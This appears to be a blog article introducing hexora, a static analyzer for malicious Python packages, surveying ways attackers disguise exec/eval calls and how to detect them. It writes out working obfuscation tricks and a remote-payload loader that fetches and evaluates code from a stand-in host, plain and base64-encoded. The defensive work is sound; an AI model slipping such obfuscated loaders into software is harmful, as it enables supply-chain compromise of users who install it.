Tracking malicious code execution in Python

Recently, I have been working on a new library that statically analyzes Python scripts and detects malicious or harmful code. It's called hexora.

Supply chain attacks have become increasingly common. More than 100 incidents were reported in the past five years for PyPI alone. Let's consider a scenario where a threat actor attempts to upload a malicious package to PyPI.

Usually, malicious packages imitate a legitimate library so that its main code works as expected. The malicious part is typically inserted into one of the library's files and executed silently on import.

An inexperienced actor will likely not obfuscate their code at all. Experienced actors usually obfuscate their code or try to evade simple heuristics such as regexes. Regexes are fragile: simple tricks can fool them, and a defender cannot anticipate every such trick in advance.

One of the problems is that the more heavily code is obfuscated, the more suspicious it looks and the easier it is to detect. So actors try to strike a balance.

In this article, let's see how calls to eval or exec can be obfuscated and abused.

Basic usage



The naive way looks as follows:

exec("print(2 + 2)")

eval("2 + 2")

The problem is that many security and audit tools search for exec or eval and flag the code for human review.

This kind of search is usually done using regexes.
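To make the weakness concrete, here is a minimal sketch of that kind of check. The pattern and the `naive_scan` helper are hypothetical and not taken from any specific tool; they flag every line where `exec` or `eval` is followed by an opening parenthesis.

```python
import re

# Hypothetical naive rule: the word exec or eval followed by "(".
NAIVE_PATTERN = re.compile(r"\b(?:exec|eval)\s*\(")


def naive_scan(source: str) -> list[int]:
    """Return the 1-based numbers of lines that match the naive rule."""
    return [
        lineno
        for lineno, line in enumerate(source.splitlines(), start=1)
        if NAIVE_PATTERN.search(line)
    ]


sample = 'exec("print(2 + 2)")\neval("2 + 2")\nprint("nothing to see")\n'
print(naive_scan(sample))  # [1, 2]
```

It catches both snippets above, but it only sees raw text, so any spelling that does not literally contain `exec(` or `eval(` slips through.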

Confusable homoglyphs

If we only need to bypass simple regexes, confusable homoglyphs can be used.

ℯ𝓍ℯ𝒸("print(2 + 2)")

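This actually works in Python! Identifiers are normalized to NFKC form during parsing (PEP 3131), so ℯ𝓍ℯ𝒸 refers to the same name as exec.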

If proper AST parsing is used, it will be detected as a regular exec call.
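A quick way to confirm this is to parse the homoglyph snippet with the standard `ast` module and list the names of the called functions. This is a minimal sketch, not a full detector:

```python
import ast

source = 'ℯ𝓍ℯ𝒸("print(2 + 2)")'

# Collect the names of all plain function calls in the parsed tree.
# The look-alike name arrives here already normalized to ASCII.
called = [
    node.func.id
    for node in ast.walk(ast.parse(source))
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
]
print(called)  # ['exec']
```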

When regexes are used, the input must be normalized first.
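One way to do that, sketched below under the assumption that the scanner works on the whole file as text, is to apply the same NFKC normalization Python uses for identifiers via `unicodedata.normalize` before matching. The `exec(`/`eval(` pattern is a hypothetical example rule. Note that this also normalizes string literals and comments, which Python itself leaves alone, so it can occasionally produce extra matches.

```python
import re
import unicodedata

# Hypothetical rule: exec or eval followed by "(".
PATTERN = re.compile(r"\b(?:exec|eval)\s*\(")


def normalized_match(source: str) -> bool:
    """Match the rule after NFKC-normalizing the whole text."""
    return PATTERN.search(unicodedata.normalize("NFKC", source)) is not None


print(normalized_match('ℯ𝓍ℯ𝒸("print(2 + 2)")'))  # True
print(normalized_match("print(2 + 2)"))          # False
```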

Using the builtins module

Surprisingly, by simply using the builtins module, some detections can be bypassed:

import builtins

builtins.exec("print(2 + 2)")

Obfuscating the use of the builtins module

By binding the builtins module to a new name (such as b), we can bypass simple detections:

import builtins

b = builtins

b.exec("2+2")

Even when a simple analyzer knows about the builtins module, it usually does not follow variable assignments.
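Following assignments does not take much machinery in the simple case. The sketch below (a hypothetical `find_aliased_calls` helper, not hexora's code) walks module-level statements in source order, remembers every name bound to `builtins`, and flags `.exec(...)`/`.eval(...)` calls made through those names. It ignores scopes, functions and later reassignments, which a real analyzer would have to handle.

```python
import ast

DANGEROUS = {"exec", "eval"}


def find_aliased_calls(source: str) -> list[int]:
    """Return line numbers of exec/eval calls made through a name bound to builtins."""
    aliases: set[str] = set()
    hits: list[int] = []
    for stmt in ast.parse(source).body:  # module level only, in source order
        # Record new names for the builtins module.
        if isinstance(stmt, ast.Import):
            for alias in stmt.names:
                if alias.name == "builtins":
                    aliases.add(alias.asname or alias.name)
        elif isinstance(stmt, ast.Assign) and isinstance(stmt.value, ast.Name):
            if stmt.value.id in aliases:  # e.g. b = builtins
                for target in stmt.targets:
                    if isinstance(target, ast.Name):
                        aliases.add(target.id)
        # Look for <alias>.exec(...) / <alias>.eval(...) anywhere in the statement.
        for node in ast.walk(stmt):
            if (
                isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr in DANGEROUS
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id in aliases
            ):
                hits.append(node.lineno)
    return hits


code = "import builtins\nb = builtins\nb.exec('2+2')\n"
print(find_aliased_calls(code))  # [3]
```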

Using __import__

The __import__ dunder function can be used to avoid importing the builtins module the regular way:

__import__("builtins").exec("2+2")

Constants obfuscation

Obfuscating constants makes simple detections even harder.

__import__("built" + "ins").exec("2+2")

We can also use the getattr function to look up exec by a string instead of writing it as an attribute:

getattr(__import__("built"+"ins"),"ex"+"ec")("2+2")

# OR

__import__("built"+"ins").__getattribute__("ex"+"ec")("2+2")

Another option is to hide the exec string with sequence manipulation such as reversed(), str.join() or slicing with [::-1]:

getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")

My library can track all of these cases because it evaluates basic string operations.

It only triggers when actual exec or eval calls are detected. Here is its output for a test file that uses two of these tricks:

warning[HX3030]: Execution of an unwanted code via getattr(__import__(..), ..)
  ┌─ resources/test/test.py:1:1
  │
1 │ getattr(__import__("built"+"ins"),"".join(reversed(["ec","ex"])))("2+2")
  │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
  │
  = Confidence: VeryHigh

warning[HX3030]: Execution of an unwanted code via __import__
  ┌─ resources/test/test.py:6:1
  │
5 │
6 │ __import__("snitliub"[::-1]).eval("print(123)")
  │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3030
  │
  = Confidence: VeryHigh
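hexora's implementation is not shown here, but the general technique is constant folding: walk the AST and compute the value of any expression built only from string literals. The sketch below is a hypothetical, minimal version that understands just the tricks from this section (`+`, `"".join(...)`, `reversed(...)` and `[::-1]`); `fold_str` and `resolve` are illustrative names.

```python
import ast


def fold_seq(node: ast.AST):
    """Fold a list/tuple of strings, or reversed() of one, into a Python list."""
    if isinstance(node, (ast.List, ast.Tuple)):
        items = [fold_str(elt) for elt in node.elts]
        return None if None in items else items
    if (
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id == "reversed"
        and len(node.args) == 1
    ):
        items = fold_seq(node.args[0])
        return None if items is None else items[::-1]
    return None


def fold_str(node: ast.AST):
    """Return the constant string an expression evaluates to, or None if unknown."""
    # Plain literal: "exec"
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    # Concatenation: "ex" + "ec"
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold_str(node.left), fold_str(node.right)
        if left is not None and right is not None:
            return left + right
        return None
    # Join: "".join([...]) or "".join(reversed([...]))
    if (
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Attribute)
        and node.func.attr == "join"
        and len(node.args) == 1
    ):
        sep, items = fold_str(node.func.value), fold_seq(node.args[0])
        if sep is not None and items is not None:
            return sep.join(items)
        return None
    # Reversal: "snitliub"[::-1]
    if isinstance(node, ast.Subscript) and isinstance(node.slice, ast.Slice):
        value, sl = fold_str(node.value), node.slice
        if value is None or sl.lower is not None or sl.upper is not None or sl.step is None:
            return None
        try:
            step = ast.literal_eval(sl.step)  # -1 is parsed as UnaryOp(USub, 1)
        except ValueError:
            return None
        return value[::-1] if step == -1 else None
    return None


def resolve(expr: str):
    """Parse a single expression and try to fold it to a string."""
    return fold_str(ast.parse(expr, mode="eval").body)


print(resolve('"built" + "ins"'))                  # builtins
print(resolve('"".join(reversed(["ec", "ex"]))'))  # exec
print(resolve('"snitliub"[::-1]'))                 # builtins
print(resolve('name + "ins"'))                     # None
```

Once a module or attribute name folds to `builtins`, `exec` or `eval`, the call can be matched as if it had been written out in plain text.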

Importlib

Using __import__ is not the only way to import a module. You can also use importlib:

import importlib

importlib.import_module("builtins").exec("2+2")

Both __import__ and importlib are often tracked since they are relatively rare in legitimate code.

Using sys.modules, globals(), locals() or vars()

The import machinery can be bypassed entirely by looking the module up in sys.modules, globals(), locals() or vars():

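import sys
import builtins  # locals() and vars() only see names bound in the current scope

sys.modules["builtins"].exec("2+2")

# In __main__, __builtins__ is the builtins module; in an imported module it is
# usually the module's __dict__ (a CPython detail), so there it needs ["exec"]
globals()["__builtins__"].exec("2+2")

locals()["builtins"].exec("2+2")

vars()["builtins"].exec("2+2")

# Hide everything (same __main__-only caveat as above)
getattr(globals()["__bu"+"ilt"+"ins__"],"".join(reversed(["al","ev"])))("2+2")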
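Detecting these lookups means treating `sys.modules`, `globals()`, `locals()` and `vars()` as containers and checking which key is read from them. Below is a minimal sketch of that idea, assuming Python 3.9+ AST shapes (where a subscript key is stored directly in `node.slice`); the helper names are hypothetical, and key folding is limited to `+` concatenation of string literals.

```python
import ast

LOOKUP_FUNCS = {"globals", "locals", "vars"}
BUILTIN_KEYS = {"builtins", "__builtins__"}


def concat(node: ast.AST):
    """Fold string literals joined with "+"; return None for anything else."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = concat(node.left), concat(node.right)
        if left is not None and right is not None:
            return left + right
    return None


def is_namespace(node: ast.AST) -> bool:
    """True for sys.modules and for globals(), locals() or vars() without arguments."""
    if isinstance(node, ast.Attribute):
        return (
            node.attr == "modules"
            and isinstance(node.value, ast.Name)
            and node.value.id == "sys"
        )
    return (
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id in LOOKUP_FUNCS
        and not node.args
    )


def find_builtins_lookups(source: str) -> list[int]:
    """Return line numbers where a namespace is indexed with a builtins-like key."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Subscript) and is_namespace(node.value):
            if concat(node.slice) in BUILTIN_KEYS:
                hits.append(node.lineno)
    return sorted(hits)  # ast.walk is breadth-first, so sort by line


sample = (
    "import sys\n"
    'sys.modules["builtins"].exec("2+2")\n'
    'globals()["__bu" + "ilt" + "ins__"]\n'
    'locals()["os"]\n'
)
print(find_builtins_lookups(sample))  # [2, 3]
```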

Using compile

Calls to exec and eval can be avoided by using compile:

import types

types.FunctionType(compile("print(2+2)","<string>","exec"), globals())()

This can also be obfuscated further or detected using similar techniques as before.

It only avoids direct calls to exec and eval.
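Since the trick still needs `compile` to turn a string into a code object, the call itself is a useful signal. The sketch below is a hypothetical, deliberately narrow check: it flags calls to the bare name `compile` (so `re.compile` is not matched) and to anything named `FunctionType`. It does not follow aliases such as `c = compile`.

```python
import ast


def find_compile_tricks(source: str) -> list[tuple[int, str]]:
    """Flag bare compile(...) calls and calls to anything named FunctionType."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id == "compile":
            hits.append((node.lineno, "compile"))
        elif isinstance(func, (ast.Name, ast.Attribute)):
            # types.FunctionType(...) or a directly imported FunctionType(...)
            name = func.id if isinstance(func, ast.Name) else func.attr
            if name == "FunctionType":
                hits.append((node.lineno, "FunctionType"))
    return sorted(hits)


snippet = (
    "import re, types\n"
    're.compile("x")\n'
    'types.FunctionType(compile("print(2+2)", "<string>", "exec"), globals())()\n'
)
print(find_compile_tricks(snippet))  # [(3, 'FunctionType'), (3, 'compile')]
```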

What's usually passed to exec or eval?

Usually, the code passed to exec or eval is obfuscated as well.

This can be achieved with various encodings, serialization formats and compression algorithms, such as base64, hex, rot13, marshal and zlib.
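For analysis, such layers can often be peeled off automatically. The sketch below is a hypothetical helper that knows only two of the layers mentioned above, base64 and zlib, and keeps stripping them until neither applies. It is greedy, so plain text that happens to be valid base64 would be mangled; treat the result as a hint for a human, not a verdict.

```python
import base64
import binascii
import zlib


def peel(data: bytes, max_layers: int = 10) -> bytes:
    """Strip zlib and base64 layers until neither applies (or max_layers is hit)."""
    for _ in range(max_layers):
        try:
            data = zlib.decompress(data)
            continue
        except zlib.error:
            pass
        try:
            # validate=True rejects characters outside the base64 alphabet
            data = base64.b64decode(data, validate=True)
            continue
        except binascii.Error:
            pass
        break  # neither layer applies any more
    return data


# A harmless two-layer sample: compress with zlib, then encode with base64.
layered = base64.b64encode(zlib.compress(b"print(2 + 2)"))
print(peel(layered))  # b'print(2 + 2)'
```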

Often, the payload is kept as small as possible so that it is harder to spot in the code. This matters most when the call is hidden behind excessive whitespace: with line wrapping disabled, editors push it off-screen, and the only way to notice it is to scroll horizontally.
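Padding like that is cheap to spot once you look for it. A minimal sketch, assuming an arbitrary threshold of 80 consecutive spaces or tabs between two non-whitespace characters on the same line; ordinary indentation is not matched because the pattern requires code on both sides of the gap.

```python
import re

# Hypothetical threshold: 80 or more spaces/tabs with code on both sides.
HIDDEN_TAIL = re.compile(r"\S[ \t]{80,}\S")


def find_hidden_tails(source: str) -> list[int]:
    """Return 1-based line numbers where code sits after a long run of padding."""
    return [
        lineno
        for lineno, line in enumerate(source.splitlines(), start=1)
        if HIDDEN_TAIL.search(line)
    ]


padded = "import os" + " " * 200 + ";exec('print(1)')\nx = 1\n"
print(find_hidden_tails(padded))  # [1]
```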

For example, a minimal payload can download an external script and execute it:

import urllib.request;eval(urllib.request.urlopen("http://malicious.com/payload.py").read().decode("utf-8"))

The final code injection can look as follows:

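import base64

# exec rather than eval: the decoded payload starts with an import statement,
# which eval() rejects with a SyntaxError
getattr(globals()["__bu" + "ilt" + "ins__"], "".join(reversed(["ec", "ex"])))(
    base64.b64decode(
        "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
    )
)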

When eval/exec calls are chained with base64, it's another sign that something fishy is going on. Typically, you won't see such calls in legitimate code.
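As a rough illustration of that signal, the following hypothetical check flags any call that receives the result of a `b64decode(...)` call directly as its first argument and whose callee is either `exec`/`eval` or computed at runtime (for example, the result of `getattr(...)`). It is a heuristic sketch and misses cases where the decoded value passes through a variable first.

```python
import ast

EXEC_NAMES = {"exec", "eval"}


def is_b64decode_call(node: ast.AST) -> bool:
    """True for b64decode(...) or <anything>.b64decode(...)."""
    if not isinstance(node, ast.Call):
        return False
    func = node.func
    return (isinstance(func, ast.Name) and func.id == "b64decode") or (
        isinstance(func, ast.Attribute) and func.attr == "b64decode"
    )


def find_exec_of_base64(source: str) -> list[int]:
    """Flag calls whose first argument is decoded base64 and whose callee looks like exec/eval."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        callee = node.func
        # A plain exec/eval, or a callable computed at runtime such as getattr(...)
        suspicious = (
            isinstance(callee, ast.Name) and callee.id in EXEC_NAMES
        ) or isinstance(callee, ast.Call)
        if suspicious and is_b64decode_call(node.args[0]):
            hits.append(node.lineno)
    return sorted(hits)


sample = (
    "import base64\n"
    'print(base64.b64decode("aGk="))\n'
    'getattr(globals()["__builtins__"], "exec")(base64.b64decode("aGk="))\n'
)
print(find_exec_of_base64(sample))  # [3]
```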

Also, since base64 strings usually have a length that is a multiple of 4 and consist of a specific set of characters, they can be detected too.

warning[HX6000]: Base64 encoded string found, potentially obfuscated code.
  ┌─ resources/test/test.py:3:9
  │
2 │ base64.b64decode(
3 │ "aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2V2YWwodXJsbGliLnJlcXVlc3QudXJsb3BlbigiaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5weSIpLnJlYWQoKSk="
  │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX6000
4 │ )
  │
  = Confidence: Medium

Help: Base64-encoded strings can be used to obfuscate code or data.
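The length and alphabet heuristic can be sketched in a few lines. This is a hypothetical version, not hexora's rule: it requires only base64 characters with optional `=` padding, a length that is a multiple of 4, a minimum length of 40 (an arbitrary cutoff to skip short words), and a successful strict decode. Long hex digests and similar tokens can pass it too, so a hit is a weak signal on its own.

```python
import base64
import binascii
import re

# Standard base64 alphabet, at most two "=" padding characters, and an
# arbitrary minimum of 40 characters to skip ordinary short strings.
CANDIDATE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def looks_like_base64(s: str) -> bool:
    """Heuristic: right alphabet, length a multiple of 4, and a strict decode succeeds."""
    if len(s) % 4 != 0 or CANDIDATE.fullmatch(s) is None:
        return False
    try:
        base64.b64decode(s, validate=True)
    except binascii.Error:
        return False
    return True


encoded = base64.b64encode(b"print('hello from a hidden payload')").decode()
print(looks_like_base64(encoded))        # True
print(looks_like_base64("hello world"))  # False
```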

Conclusion

These are basic techniques, yet threat actors still abuse them in packages they upload to PyPI.

As you can see, tracking such things in a very dynamic language such as Python is hard! Even when static analysis is used, you need to track a lot of things to be effective.

Static analysis can be replaced with dynamic analysis (code sandboxing), but such an approach has its own drawbacks.

LLMs are pretty good at detecting malicious code as well, but they tend to produce false positives and false negatives. They also have significant costs when scanning tens of thousands of files.

Some companies and research projects train their own machine learning models. Compared to LLMs, these cost far less, but they also require human review because of the same accuracy problems.

The best way to approach this problem is to combine all of these techniques and use a human in the loop for the final decision.

If you have any questions, feel free to send them to the e-mail address shown in the footer.

All articles on this website are written by a human without LLM assistance.